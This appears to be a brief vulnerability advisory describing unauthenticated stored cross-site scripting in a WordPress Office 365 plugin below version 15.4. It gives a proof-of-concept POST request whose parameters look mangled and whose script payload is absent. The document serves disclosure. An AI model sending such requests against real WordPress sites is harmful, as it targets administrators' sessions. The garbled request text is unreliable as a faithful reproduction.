WordPress + Microsoft Office 365 < 15.4 - Unauthenticated Stored Cross-Site Scripting

The plugin does not sanitise error descriptions before outputting them in the log notice, which could allow unauthenticated users to perform Cross-Site Scripting attacks against a logged in administrator

PoC

POST / HTTP/1.1 Content-Length: 242 Content-Type: application/x-www-form-urlencoded error=2&error;_description=&error;_uri=https%3A%2F%2Flogin.microsoftonline.com%2Ferror%3Fcode%3D700054&state;=https%3A%2F%2F192.168.88.176%2Fwp-login.php%3Flogin_errors%3DCHECK_LOG2